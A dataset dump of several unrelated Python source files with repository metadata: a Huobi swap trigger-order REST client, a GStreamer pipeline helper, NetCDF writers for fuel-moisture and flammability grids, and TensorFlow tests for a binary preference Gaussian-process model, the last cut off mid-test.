| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
94fc20360c0dace3274e116577e122ad654cbb94
| 4,785
|
py
|
Python
|
huobi/platforms/huobi_usdt_swap/rest_trigger_order.py
|
yahgwai/huobi_futures_Python
|
6f96379368b53848017df2f6a94f3a53083cec0a
|
[
"MIT"
] | null | null | null |
huobi/platforms/huobi_usdt_swap/rest_trigger_order.py
|
yahgwai/huobi_futures_Python
|
6f96379368b53848017df2f6a94f3a53083cec0a
|
[
"MIT"
] | null | null | null |
huobi/platforms/huobi_usdt_swap/rest_trigger_order.py
|
yahgwai/huobi_futures_Python
|
6f96379368b53848017df2f6a94f3a53083cec0a
|
[
"MIT"
] | null | null | null |
from huobi.platforms.huobi_usdt_swap.http_utils import *
class RestTriggerOrder:
def __init__(self, access_key: str, secret_key: str, host: str = None):
self.access_key = access_key
self.secret_key = secret_key
if host is None:
host = "api.btcgateway.pro"
self.host = host
def isolated_order(self, data: dict = None) -> json:
path = "/linear-swap-api/v1/swap_trigger_order"
return post(self.access_key, self.secret_key, self.host, path, data)
def cross_order(self, data: dict = None) -> json:
path = "/linear-swap-api/v1/swap_cross_trigger_order"
return post(self.access_key, self.secret_key, self.host, path, data)
def isolated_cancel(self, data: dict = None) -> json:
path = "/linear-swap-api/v1/swap_trigger_cancel"
return post(self.access_key, self.secret_key, self.host, path, data)
def cross_cancel(self, data: dict = None) -> json:
path = "/linear-swap-api/v1/swap_cross_trigger_cancel"
return post(self.access_key, self.secret_key, self.host, path, data)
def isolated_cancel_all(self, data: dict = None) -> json:
path = "/linear-swap-api/v1/swap_trigger_cancelall"
return post(self.access_key, self.secret_key, self.host, path, data)
def cross_cancel_all(self, data: dict = None) -> json:
path = "/linear-swap-api/v1/swap_cross_trigger_cancelall"
return post(self.access_key, self.secret_key, self.host, path, data)
def isolated_get_open_orders(self, data: dict = None) -> json:
path = "/linear-swap-api/v1/swap_trigger_openorders"
return post(self.access_key, self.secret_key, self.host, path, data)
def cross_get_open_orders(self, data: dict = None) -> json:
path = "/linear-swap-api/v1/swap_cross_trigger_openorders"
return post(self.access_key, self.secret_key, self.host, path, data)
def isolated_get_his_orders(self, data: dict = None) -> json:
path = "/linear-swap-api/v1/swap_trigger_hisorders"
return post(self.access_key, self.secret_key, self.host, path, data)
def cross_get_his_orders(self, data: dict = None) -> json:
path = "/linear-swap-api/v1/swap_cross_trigger_hisorders"
return post(self.access_key, self.secret_key, self.host, path, data)
def isolated_tpsl_order(self, data: dict = None) -> json:
path = "/linear-swap-api/v1/swap_tpsl_order"
return post(self.access_key, self.secret_key, self.host, path, data)
def cross_tpsl_order(self, data: dict = None) -> json:
path = "/linear-swap-api/v1/swap_cross_tpsl_order"
return post(self.access_key, self.secret_key, self.host, path, data)
def isolated_tpsl_cancel(self, data: dict = None) -> json:
path = "/linear-swap-api/v1/swap_tpsl_cancel"
return post(self.access_key, self.secret_key, self.host, path, data)
def cross_tpsl_cancel(self, data: dict = None) -> json:
path = "/linear-swap-api/v1/swap_cross_tpsl_cancel"
return post(self.access_key, self.secret_key, self.host, path, data)
def isolated_tpsl_cancel_all(self, data: dict = None) -> json:
path = "/linear-swap-api/v1/swap_tpsl_cancelall"
return post(self.access_key, self.secret_key, self.host, path, data)
def cross_tpsl_cancel_all(self, data: dict = None) -> json:
path = "/linear-swap-api/v1/swap_cross_tpsl_cancelall"
return post(self.access_key, self.secret_key, self.host, path, data)
def isolated_get_tpsl_open_orders(self, data: dict = None) -> json:
path = "/linear-swap-api/v1/swap_tpsl_openorders"
return post(self.access_key, self.secret_key, self.host, path, data)
def cross_get_tpsl_open_orders(self, data: dict = None) -> json:
path = "/linear-swap-api/v1/swap_cross_tpsl_openorders"
return post(self.access_key, self.secret_key, self.host, path, data)
def isolated_get_tpsl_his_orders(self, data: dict = None) -> json:
path = "/linear-swap-api/v1/swap_tpsl_hisorders"
return post(self.access_key, self.secret_key, self.host, path, data)
def cross_get_tpsl_his_orders(self, data: dict = None) -> json:
path = "/linear-swap-api/v1/swap_cross_tpsl_hisorders"
return post(self.access_key, self.secret_key, self.host, path, data)
def isolated_get_relation_tpsl_order(self, data: dict = None) -> json:
path = "/linear-swap-api/v1/swap_relation_tpsl_order"
return post(self.access_key, self.secret_key, self.host, path, data)
def cross_get_relation_tpsl_order(self, data: dict = None) -> json:
path = "/linear-swap-api/v1/swap_cross_relation_tpsl_order"
return post(self.access_key, self.secret_key, self.host, path, data)
| 48.826531
| 76
| 0.686938
| 709
| 4,785
| 4.393512
| 0.066291
| 0.101124
| 0.100161
| 0.140289
| 0.939005
| 0.931942
| 0.931942
| 0.931942
| 0.931942
| 0.931942
| 0
| 0.005694
| 0.192476
| 4,785
| 98
| 77
| 48.826531
| 0.800466
| 0
| 0
| 0.297297
| 0
| 0
| 0.200167
| 0.196406
| 0
| 0
| 0
| 0
| 0
| 1
| 0.310811
| false
| 0
| 0.013514
| 0
| 0.635135
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
a21ab3a270b479cb629aff6bebd49c85e29d8a8a
| 225
|
py
|
Python
|
pertemuan_12/gst_file.py
|
Muhammad-Yunus/Jetson-Nano-OpenCV-Learn
|
933cb2594539a877030fb82dc3e6867409c1a557
|
[
"Apache-2.0"
] | null | null | null |
pertemuan_12/gst_file.py
|
Muhammad-Yunus/Jetson-Nano-OpenCV-Learn
|
933cb2594539a877030fb82dc3e6867409c1a557
|
[
"Apache-2.0"
] | null | null | null |
pertemuan_12/gst_file.py
|
Muhammad-Yunus/Jetson-Nano-OpenCV-Learn
|
933cb2594539a877030fb82dc3e6867409c1a557
|
[
"Apache-2.0"
] | 2
|
2021-09-28T00:24:21.000Z
|
2022-03-09T13:38:29.000Z
|
def gst_file_loader(filename):
return 'filesrc location=' + filename + ' ! qtdemux ! queue ! h264parse ! omxh264dec ! nvvidconv ! video/x-raw,format=BGRx ! queue ! videoconvert ! queue ! video/x-raw, format=BGR ! appsink'
| 112.5
| 194
| 0.715556
| 28
| 225
| 5.678571
| 0.75
| 0.075472
| 0.113208
| 0.188679
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.031579
| 0.155556
| 225
| 2
| 194
| 112.5
| 0.805263
| 0
| 0
| 0
| 0
| 0.5
| 0.730089
| 0.10177
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 9
|
bf73cf72eea2cf91c3515f5d285c35c44acac2a2
| 10,521
|
py
|
Python
|
gridflow/netcdf.py
|
ANU-WALD/gridflow_lib
|
8757230c95fba00a1b7457867ab84307c2672729
|
[
"Apache-2.0"
] | null | null | null |
gridflow/netcdf.py
|
ANU-WALD/gridflow_lib
|
8757230c95fba00a1b7457867ab84307c2672729
|
[
"Apache-2.0"
] | null | null | null |
gridflow/netcdf.py
|
ANU-WALD/gridflow_lib
|
8757230c95fba00a1b7457867ab84307c2672729
|
[
"Apache-2.0"
] | null | null | null |
from osgeo import gdal
import numpy as np
import netCDF4
import json
from datetime import datetime
def pack_fmc(hdf_file, date, mean_arr, std_arr, q_mask, dest):
with netCDF4.Dataset(dest, 'w', format='NETCDF4_CLASSIC') as ds:
with open('nc_metadata.json') as data_file:
attrs = json.load(data_file)
for key in attrs:
setattr(ds, key, attrs[key])
setattr(ds, "date_created", datetime.now().strftime("%Y%m%dT%H%M%S"))
rast = gdal.Open('HDF4_EOS:EOS_GRID:"{}":MOD_Grid_BRDF:Nadir_Reflectance_Band1'.format(hdf_file))
proj_wkt = rast.GetProjection()
geot = rast.GetGeoTransform()
t_dim = ds.createDimension("time", 1)
x_dim = ds.createDimension("x", rast.RasterXSize)
y_dim = ds.createDimension("y", rast.RasterYSize)
var = ds.createVariable("time", "f8", ("time",))
var.units = "seconds since 1970-01-01 00:00:00.0"
var.calendar = "standard"
var.long_name = "Time, unix time-stamp"
var.standard_name = "time"
var[:] = netCDF4.date2num([date], units="seconds since 1970-01-01 00:00:00.0", calendar="standard")
var = ds.createVariable("x", "f8", ("x",))
var.units = "m"
var.long_name = "x coordinate of projection"
var.standard_name = "projection_x_coordinate"
var[:] = np.linspace(geot[0], geot[0]+(geot[1]*rast.RasterXSize), rast.RasterXSize)
var = ds.createVariable("y", "f8", ("y",))
var.units = "m"
var.long_name = "y coordinate of projection"
var.standard_name = "projection_y_coordinate"
var[:] = np.linspace(geot[3], geot[3]+(geot[5]*rast.RasterYSize), rast.RasterYSize)
var = ds.createVariable("lfmc_mean", 'f4', ("time", "y", "x"), fill_value=-9999.9)
var.long_name = "LFMC Arithmetic Mean"
var.units = '%'
var.grid_mapping = "sinusoidal"
var[:] = mean_arr[None,...]
var = ds.createVariable("lfmc_stdv", 'f4', ("time", "y", "x"), fill_value=-9999.9)
var.long_name = "LFMC Standard Deviation"
var.units = '%'
var.grid_mapping = "sinusoidal"
var[:] = std_arr[None,...]
var = ds.createVariable("quality_mask", 'i1', ("time", "y", "x"), fill_value=0)
var.long_name = "Combined Bands Quality Mask"
var.units = 'Cat'
var.grid_mapping = "sinusoidal"
var[:] = q_mask.astype(np.int8)[None,...]
var = ds.createVariable("sinusoidal", 'S1', ())
var.grid_mapping_name = "sinusoidal"
var.false_easting = 0.0
var.false_northing = 0.0
var.longitude_of_central_meridian = 0.0
var.longitude_of_prime_meridian = 0.0
var.semi_major_axis = 6371007.181
var.inverse_flattening = 0.0
var.spatial_ref = proj_wkt
var.GeoTransform = "{} {} {} {} {} {} ".format(*[geot[i] for i in range(6)])
def pack_flammability(fmc_file, date, flam, anom, q_mask, dest):
with netCDF4.Dataset(dest, 'w', format='NETCDF4_CLASSIC') as ds:
with open('nc_metadata.json') as data_file:
attrs = json.load(data_file)
for key in attrs:
setattr(ds, key, attrs[key])
setattr(ds, "date_created", datetime.now().strftime("%Y%m%dT%H%M%S"))
rast = gdal.Open('NETCDF:"{}":lfmc_mean'.format(fmc_file))
proj_wkt = rast.GetProjection()
geot = rast.GetGeoTransform()
t_dim = ds.createDimension("time", 1)
x_dim = ds.createDimension("x", rast.RasterXSize)
y_dim = ds.createDimension("y", rast.RasterYSize)
var = ds.createVariable("time", "f8", ("time",))
var.units = "seconds since 1970-01-01 00:00:00.0"
var.calendar = "standard"
var.long_name = "Time, unix time-stamp"
var.standard_name = "time"
var[:] = netCDF4.date2num([date], units="seconds since 1970-01-01 00:00:00.0", calendar="standard")
var = ds.createVariable("x", "f8", ("x",))
var.units = "m"
var.long_name = "x coordinate of projection"
var.standard_name = "projection_x_coordinate"
var[:] = np.linspace(geot[0], geot[0]+(geot[1]*rast.RasterXSize), rast.RasterXSize)
var = ds.createVariable("y", "f8", ("y",))
var.units = "m"
var.long_name = "y coordinate of projection"
var.standard_name = "projection_y_coordinate"
var[:] = np.linspace(geot[3], geot[3]+(geot[5]*rast.RasterYSize), rast.RasterYSize)
var = ds.createVariable("flammability", 'f4', ("time", "y", "x"), fill_value=-9999.9)
var.long_name = "Flammability Index"
var.units = '%'
var.grid_mapping = "sinusoidal"
var[:] = flam[None,...]
var = ds.createVariable("anomaly", 'f4', ("time", "y", "x"), fill_value=-9999.9)
var.long_name = "Flammability Anomaly"
var.units = '%'
var.grid_mapping = "sinusoidal"
var[:] = anom[None,...]
var = ds.createVariable("quality_mask", 'i1', ("time", "y", "x"), fill_value=0)
var.long_name = "Combined Bands Quality Mask"
var.units = 'Cat'
var.grid_mapping = "sinusoidal"
var[:] = q_mask.astype(np.int8)[None,...]
var = ds.createVariable("sinusoidal", 'S1', ())
var.grid_mapping_name = "sinusoidal"
var.false_easting = 0.0
var.false_northing = 0.0
var.longitude_of_central_meridian = 0.0
var.longitude_of_prime_meridian = 0.0
var.semi_major_axis = 6371007.181
var.inverse_flattening = 0.0
var.spatial_ref = proj_wkt
var.GeoTransform = "{} {} {} {} {} {} ".format(*[geot[i] for i in range(6)])
wgs84_wkt = 'GEOGCS["WGS 84",DATUM["WGS_1984",SPHEROID["WGS 84",6378137,298.257223563,AUTHORITY["EPSG","7030"]],AUTHORITY["EPSG","6326"]],PRIMEM["Greenwich",0,AUTHORITY["EPSG","8901"]],UNIT["degree",0.01745329251994328,AUTHORITY["EPSG","9122"]],AUTHORITY["EPSG","4326"]]'
def pack_fmc_mosaic(date, fmc_mean, fmc_stdv, q_mask, dest):
lat0 = -10.
lat1 = -44.
lon0 = 113.
lon1 = 154.
res = 0.005
x_size = int((lon1 - lon0)/res)
y_size = int((lat1 - lat0)/(-1*res))
geot = [lon0, res, 0., lat0, 0., -1*res]
with netCDF4.Dataset(dest, 'w', format='NETCDF4_CLASSIC') as ds:
with open('nc_metadata.json') as data_file:
attrs = json.load(data_file)
for key in attrs:
setattr(ds, key, attrs[key])
setattr(ds, "date_created", datetime.now().strftime("%Y%m%dT%H%M%S"))
t_dim = ds.createDimension("time", 1)
x_dim = ds.createDimension("longitude", fmc_mean.shape[1])
y_dim = ds.createDimension("latitude", fmc_mean.shape[0])
var = ds.createVariable("time", "f8", ("time",))
var.units = "seconds since 1970-01-01 00:00:00.0"
var.calendar = "standard"
var.long_name = "Time, unix time-stamp"
var.standard_name = "time"
var[:] = netCDF4.date2num([date], units="seconds since 1970-01-01 00:00:00.0", calendar="standard")
var = ds.createVariable("longitude", "f8", ("longitude",))
var.units = "degrees"
var.long_name = "longitude"
var.standard_name = "longitude"
var[:] = np.linspace(lon0, lon1-res, num=x_size)
var = ds.createVariable("latitude", "f8", ("latitude",))
var.units = "degrees"
var.long_name = "latitude"
var.standard_name = "latitude"
var[:] = np.linspace(lat0, lat1+res, num=y_size)
var = ds.createVariable("fmc_mean", 'f4', ("time", "latitude", "longitude"), fill_value=-9999.9)
var.long_name = "Mean Live Fuel Moisture Content"
var.units = '%'
var[:] = fmc_mean[None,...]
var = ds.createVariable("fmc_stdv", 'f4', ("time", "latitude", "longitude"), fill_value=-9999.9)
var.long_name = "Standard Deviation Live Fuel Moisture Content"
var.units = '%'
var[:] = fmc_stdv[None,...]
var = ds.createVariable("quality_mask", 'i1', ("time", "latitude", "longitude"), fill_value=0)
var.long_name = "Quality Mask"
var.units = 'Cat'
var[:] = q_mask[None,...]
def pack_flammability_mosaic(date, flam, anom, q_mask, dest):
lat0 = -10.
lat1 = -44.
lon0 = 113.
lon1 = 154.
res = 0.005
x_size = int((lon1 - lon0)/res)
y_size = int((lat1 - lat0)/(-1*res))
geot = [lon0, res, 0., lat0, 0., -1*res]
with netCDF4.Dataset(dest, 'w', format='NETCDF4_CLASSIC') as ds:
with open('nc_metadata.json') as data_file:
attrs = json.load(data_file)
for key in attrs:
setattr(ds, key, attrs[key])
setattr(ds, "date_created", datetime.now().strftime("%Y%m%dT%H%M%S"))
t_dim = ds.createDimension("time", 1)
x_dim = ds.createDimension("longitude", flam.shape[1])
y_dim = ds.createDimension("latitude", flam.shape[0])
var = ds.createVariable("time", "f8", ("time",))
var.units = "seconds since 1970-01-01 00:00:00.0"
var.calendar = "standard"
var.long_name = "Time, unix time-stamp"
var.standard_name = "time"
var[:] = netCDF4.date2num([date], units="seconds since 1970-01-01 00:00:00.0", calendar="standard")
var = ds.createVariable("longitude", "f8", ("longitude",))
var.units = "degrees"
var.long_name = "longitude"
var.standard_name = "longitude"
var[:] = np.linspace(lon0, lon1-res, num=x_size)
var = ds.createVariable("latitude", "f8", ("latitude",))
var.units = "degrees"
var.long_name = "latitude"
var.standard_name = "latitude"
var[:] = np.linspace(lat0, lat1+res, num=y_size)
var = ds.createVariable("flammability", 'f4', ("time", "latitude", "longitude"), fill_value=-9999.9)
var.long_name = "Flammability Index"
var.units = '%'
var[:] = flam[None,...]
var = ds.createVariable("anomaly", 'f4', ("time", "latitude", "longitude"), fill_value=-9999.9)
var.long_name = "FMC Anomaly"
var.units = '%'
var[:] = anom[None,...]
var = ds.createVariable("quality_mask", 'i1', ("time", "latitude", "longitude"), fill_value=0)
var.long_name = "Quality Mask"
var.units = 'Cat'
var[:] = q_mask[None,...]
| 41.75
| 271
| 0.579698
| 1,342
| 10,521
| 4.411326
| 0.134128
| 0.021959
| 0.083446
| 0.038851
| 0.892061
| 0.887162
| 0.879054
| 0.846453
| 0.833953
| 0.821959
| 0
| 0.051461
| 0.251972
| 10,521
| 251
| 272
| 41.916335
| 0.700762
| 0
| 0
| 0.834951
| 0
| 0.004854
| 0.211197
| 0.039635
| 0
| 0
| 0
| 0
| 0
| 1
| 0.019417
| false
| 0
| 0.024272
| 0
| 0.043689
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
44c1a4cf6d4b284674a47cdbd2309b417842f7f5
| 19,069
|
py
|
Python
|
tests/model/test_binary.py
|
prefopt/prefopt
|
45f3368e44cf16664ff5427a4f643f45b800d236
|
[
"MIT"
] | 11
|
2017-12-06T16:15:35.000Z
|
2021-02-17T14:37:13.000Z
|
tests/model/test_binary.py
|
prefopt/prefopt
|
45f3368e44cf16664ff5427a4f643f45b800d236
|
[
"MIT"
] | 2
|
2017-11-21T01:26:43.000Z
|
2018-01-19T23:12:01.000Z
|
tests/model/test_binary.py
|
prefopt/prefopt
|
45f3368e44cf16664ff5427a4f643f45b800d236
|
[
"MIT"
] | 3
|
2017-11-22T17:15:49.000Z
|
2018-02-02T02:57:57.000Z
|
"""
Tests for prefopt.model.binary.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import numpy as np
import tensorflow as tf
from prefopt.acquisition.expected_improvement import preprocess_data
from prefopt.data import PreferenceDict
from prefopt.model.binary import (
BinaryPreferenceModel,
compute_latent,
compute_logit,
compute_probit,
define_ard_lengthscale,
define_likelihood,
define_posterior_predictive,
define_prior,
encode_observations
)
def compute_rbf(X, Y=None, sigma_signal=None, sigma_noise=None,
lengthscale=None):
X = X / lengthscale
XX = np.einsum('ij,ij->i', X, X)[:, np.newaxis]
if Y is None or Y is X:
Y = X
YY = XX
delta_xy = np.eye(len(X))
else:
Y = Y / lengthscale
YY = np.einsum('ij,ij->i', Y, Y)
delta_xy = 0
XY = np.einsum('ij,kj->ik', X, Y)
K = (XX + YY.T - 2 * XY) / 2.0
return sigma_signal * np.exp(-K) + delta_xy * sigma_noise
def compute_posterior_predictive(X, x, f, sigma_signal, sigma_noise,
lengthscale):
N, D = X.shape
M, E = x.shape
assert D == E, (D, E)
C = compute_rbf(
X,
sigma_signal=sigma_signal,
sigma_noise=sigma_noise,
lengthscale=lengthscale
)
k = compute_rbf(
X,
Y=x,
sigma_signal=sigma_signal,
sigma_noise=sigma_noise,
lengthscale=lengthscale
)
C_inv = np.linalg.inv(C)
c = sigma_signal + sigma_noise
assert C_inv.shape == (N, N)
assert k.shape == (N, M)
mu = k.T.dot(C_inv).dot(f)
var = c - np.diag(k.T.dot(C_inv).dot(k))
assert mu.shape == (M,)
assert var.shape == (M,)
return mu, var
def compute_lengthscales(x, low, high):
return (high - low) * (1 / (1 + np.exp(-x))) + low
class TestHelperFunctions(tf.test.TestCase):
def test_compute_latent(self):
with self.test_session():
N = 3
f_ = tf.placeholder(tf.float32, [N])
f = np.array([2, 1, 0])
y = collections.OrderedDict([
((0, 1), 1),
((0, 2), -1),
((1, 2), 1),
])
sigma = 2.0
z = compute_latent(f_, y, sigma)
w = np.array([1, 2, 1]) / (np.sqrt(2) * sigma)
self.assertAllClose(
z.eval(feed_dict={f_: f}),
w
)
def test_compute_probit(self):
with self.test_session():
N = 3
z_ = tf.placeholder(tf.float32, [N])
z = np.array([0., 1.96, 3.], dtype=np.float32)
phi = compute_probit(z)
w = np.array([0.5, 0.9750021, 0.9986501], dtype=np.float32)
self.assertAllClose(
phi.eval(feed_dict={z_: z}),
w
)
def test_compute_logit(self):
with self.test_session():
N = 3
z_ = tf.placeholder(tf.float32, [N])
z = np.array([-5e1, 0, 1e6], dtype=np.float32)
phi = compute_logit(z)
w = np.array([0, 0.5, 1], dtype=np.float32)
self.assertAllClose(
phi.eval(feed_dict={z_: z}),
w
)
def test_encode_observations(self):
y = collections.OrderedDict([
((0, 1), 1),
((0, 2), 1),
((1, 2), -1),
])
d = encode_observations(y)
e = np.array([1, 1, 0])
self.assertAllEqual(d, e)
def test_define_ard_lengthscale_1d(self):
with self.test_session():
D = 1
low = 0.5
high = 6.2
gamma_, lengthscale = define_ard_lengthscale(D, low=low, high=high)
self.assertAllClose(
gamma_.mean().eval(),
np.zeros(D)
)
self.assertAllClose(
gamma_.variance().eval(),
np.ones(D)
)
gamma = np.zeros(D)
lengthscale_true = compute_lengthscales(
gamma,
np.array([low] * D),
np.array([high] * D)
)
self.assertAllClose(
lengthscale.eval(feed_dict={gamma_: gamma}),
lengthscale_true
)
def test_define_ard_lengthscale_2d(self):
with self.test_session():
D = 2
low = 0.5
high = 4.1
gamma_, lengthscale = define_ard_lengthscale(D, low=low, high=high)
self.assertAllClose(
gamma_.mean().eval(),
np.zeros(D)
)
self.assertAllClose(
gamma_.variance().eval(),
np.ones(D)
)
gamma = np.zeros(D)
lengthscale_true = compute_lengthscales(
gamma,
np.array([low] * D),
np.array([high] * D)
)
self.assertAllClose(
lengthscale.eval(feed_dict={gamma_: gamma}),
lengthscale_true
)
def test_define_prior_scalar_lengthscale(self):
with self.test_session():
# set up
X = np.array([
[0, 0],
[1, 0],
[0, 1],
[1, 1],
[2.3, 1.7],
])
N, D = X.shape
sigma_signal = 1.2
sigma_noise = 0.1
lengthscale = 1.2
# define prior
X_, K, f = define_prior(
N,
D,
sigma_noise=sigma_noise,
sigma_signal=sigma_signal,
lengthscale=lengthscale
)
self.assertAllClose(
K.eval(feed_dict={X_: X}),
compute_rbf(
X,
sigma_signal=sigma_signal,
sigma_noise=sigma_noise,
lengthscale=lengthscale
)
)
self.assertAllClose(
f.mean().eval(feed_dict={X_: X}),
np.zeros(N)
)
def test_define_prior_vector_lengthscale(self):
with self.test_session():
# set up
X = np.array([
[0, 0],
[1, 0],
[0, 1],
[1, 1],
[2.3, 1.7],
])
N, D = X.shape
sigma_signal = 1.2
sigma_noise = 0.1
lengthscale = np.array([1.1, 0.4], dtype=np.float32)
# define prior
X_, K, f = define_prior(
N,
D,
sigma_noise=sigma_noise,
sigma_signal=sigma_signal,
lengthscale=lengthscale
)
self.assertAllClose(
K.eval(feed_dict={X_: X}),
compute_rbf(
X,
sigma_signal=sigma_signal,
sigma_noise=sigma_noise,
lengthscale=lengthscale
)
)
self.assertAllClose(
f.mean().eval(feed_dict={X_: X}),
np.zeros(N)
)
def test_define_likelihood(self):
with self.test_session():
N = 3
f_ = tf.placeholder(tf.float32, [N])
f = np.array([2, 1, 0])
y = collections.OrderedDict([
((0, 1), 1),
((0, 2), -1),
((1, 2), 1),
])
sigma = 2.0
d = define_likelihood(f_, y, sigma, compute_logit)
z = np.array([1, 2, 1]) / (np.sqrt(2) * sigma)
phi = 1 / (1 + np.exp(-z))
self.assertAllClose(
d.mean().eval(feed_dict={f_: f}),
phi
)
def test_define_posterior_predictive_1d_simple(self):
with self.test_session():
N, D = 3, 1
sigma_signal = 0.7
sigma_noise = 1.5
lengthscale = 1.2
X_ = tf.placeholder(tf.float32, [N, D])
K_ = tf.placeholder(tf.float32, [N, N])
f_ = tf.placeholder(tf.float32, [N])
X = np.arange(N)[:, np.newaxis]
K = compute_rbf(
X,
sigma_signal=sigma_signal,
sigma_noise=sigma_noise,
lengthscale=lengthscale
)
f = np.zeros(N)
x_, mu, var = define_posterior_predictive(
X_,
K_,
f_,
sigma_signal,
sigma_noise,
lengthscale
)
base_dict = {
X_: X,
K_: K,
f_: f,
}
# single query point
x = np.array([0.5])[:, np.newaxis]
mu_true, var_true = compute_posterior_predictive(
X,
x=x,
f=f,
sigma_signal=sigma_signal,
sigma_noise=sigma_noise,
lengthscale=lengthscale
)
feed_dict = {x_: x}
feed_dict.update(base_dict)
self.assertAllClose(
var.eval(feed_dict=feed_dict),
var_true
)
self.assertAllClose(
mu.eval(feed_dict=feed_dict),
mu_true
)
# multiple query points
x = np.array([0, 1.5, 9])[:, np.newaxis]
mu_true, var_true = compute_posterior_predictive(
X,
x=x,
f=f,
sigma_signal=sigma_signal,
sigma_noise=sigma_noise,
lengthscale=lengthscale
)
feed_dict = {x_: x}
feed_dict.update(base_dict)
self.assertAllClose(
var.eval(feed_dict=feed_dict),
var_true
)
self.assertAllClose(
mu.eval(feed_dict=feed_dict),
mu_true
)
def test_define_posterior_predictive_2d_scalar_lengthscale(self):
with self.test_session():
N, D = 3, 2
sigma_signal = 3.3
sigma_noise = 1.5
lengthscale = 0.8
X_ = tf.placeholder(tf.float32, [N, D])
K_ = tf.placeholder(tf.float32, [N, N])
f_ = tf.placeholder(tf.float32, [N])
X = np.arange(N * D).reshape(N, D)
K = compute_rbf(
X,
sigma_signal=sigma_signal,
sigma_noise=sigma_noise,
lengthscale=lengthscale
)
f = np.zeros(N)
x_, mu, var = define_posterior_predictive(
X_,
K_,
f_,
sigma_signal,
sigma_noise,
lengthscale
)
base_dict = {
X_: X,
K_: K,
f_: f,
}
# single query point
x = np.array([[0.5, 2]])
mu_true, var_true = compute_posterior_predictive(
X,
x=x,
f=f,
sigma_signal=sigma_signal,
sigma_noise=sigma_noise,
lengthscale=lengthscale
)
feed_dict = {x_: x}
feed_dict.update(base_dict)
self.assertAllClose(
var.eval(feed_dict=feed_dict),
var_true
)
self.assertAllClose(
mu.eval(feed_dict=feed_dict),
mu_true
)
# multiple query points
x = np.array([
[0, 1.5],
[9.2, -3],
[17, 2]
])
mu_true, var_true = compute_posterior_predictive(
X,
x=x,
f=f,
sigma_signal=sigma_signal,
sigma_noise=sigma_noise,
lengthscale=lengthscale
)
feed_dict = {x_: x}
feed_dict.update(base_dict)
self.assertAllClose(
var.eval(feed_dict=feed_dict),
var_true
)
self.assertAllClose(
mu.eval(feed_dict=feed_dict),
mu_true
)
def test_define_posterior_predictive_2d_vector_lengthscale(self):
with self.test_session():
N, D = 3, 2
sigma_signal = 3.3
sigma_noise = 1.5
lengthscale = np.array([0.8, 2.3], np.float32)
X_ = tf.placeholder(tf.float32, [N, D])
K_ = tf.placeholder(tf.float32, [N, N])
f_ = tf.placeholder(tf.float32, [N])
X = np.arange(N * D).reshape(N, D)
K = compute_rbf(
X,
sigma_signal=sigma_signal,
sigma_noise=sigma_noise,
lengthscale=lengthscale
)
f = np.zeros(N)
x_, mu, var = define_posterior_predictive(
X_,
K_,
f_,
sigma_signal,
sigma_noise,
lengthscale
)
base_dict = {
X_: X,
K_: K,
f_: f,
}
# single query point
x = np.array([[0.5, 2]])
mu_true, var_true = compute_posterior_predictive(
X,
x=x,
f=f,
sigma_signal=sigma_signal,
sigma_noise=sigma_noise,
lengthscale=lengthscale
)
feed_dict = {x_: x}
feed_dict.update(base_dict)
self.assertAllClose(
var.eval(feed_dict=feed_dict),
var_true
)
self.assertAllClose(
mu.eval(feed_dict=feed_dict),
mu_true
)
# multiple query points
x = np.array([
[0, 1.5],
[9.2, -3],
[17, 2]
])
mu_true, var_true = compute_posterior_predictive(
X,
x=x,
f=f,
sigma_signal=sigma_signal,
sigma_noise=sigma_noise,
lengthscale=lengthscale
)
feed_dict = {x_: x}
feed_dict.update(base_dict)
self.assertAllClose(
var.eval(feed_dict=feed_dict),
var_true
)
self.assertAllClose(
mu.eval(feed_dict=feed_dict),
mu_true
)
def test_define_posterior_predictive_2d_ard_lengthscale(self):
with self.test_session():
N, D = 3, 2
sigma_signal = 3.3
sigma_noise = 1.5
lengthscale_ = tf.placeholder(tf.float32, [D])
lengthscale = np.array([0.2, 4.1])
X_ = tf.placeholder(tf.float32, [N, D])
K_ = tf.placeholder(tf.float32, [N, N])
f_ = tf.placeholder(tf.float32, [N])
X = np.arange(N * D).reshape(N, D)
K = compute_rbf(
X,
sigma_signal=sigma_signal,
sigma_noise=sigma_noise,
lengthscale=lengthscale
)
f = np.zeros(N)
x_, mu, var = define_posterior_predictive(
X_,
K_,
f_,
sigma_signal,
sigma_noise,
lengthscale_
)
base_dict = {
X_: X,
K_: K,
f_: f,
lengthscale_: lengthscale
}
# single query point
x = np.array([[0.5, 2]])
mu_true, var_true = compute_posterior_predictive(
X,
x=x,
f=f,
sigma_signal=sigma_signal,
sigma_noise=sigma_noise,
lengthscale=lengthscale
)
feed_dict = {x_: x}
feed_dict.update(base_dict)
self.assertAllClose(
var.eval(feed_dict=feed_dict),
var_true
)
self.assertAllClose(
mu.eval(feed_dict=feed_dict),
mu_true
)
# multiple query points
x = np.array([
[0, 1.5],
[9.2, -3],
[17, 2]
])
mu_true, var_true = compute_posterior_predictive(
X,
x=x,
f=f,
sigma_signal=sigma_signal,
sigma_noise=sigma_noise,
lengthscale=lengthscale
)
feed_dict = {x_: x}
feed_dict.update(base_dict)
self.assertAllClose(
var.eval(feed_dict=feed_dict),
var_true
)
self.assertAllClose(
mu.eval(feed_dict=feed_dict),
mu_true
)
class TestModel(tf.test.TestCase):
def test_invalid_link(self):
with self.assertRaises(ValueError):
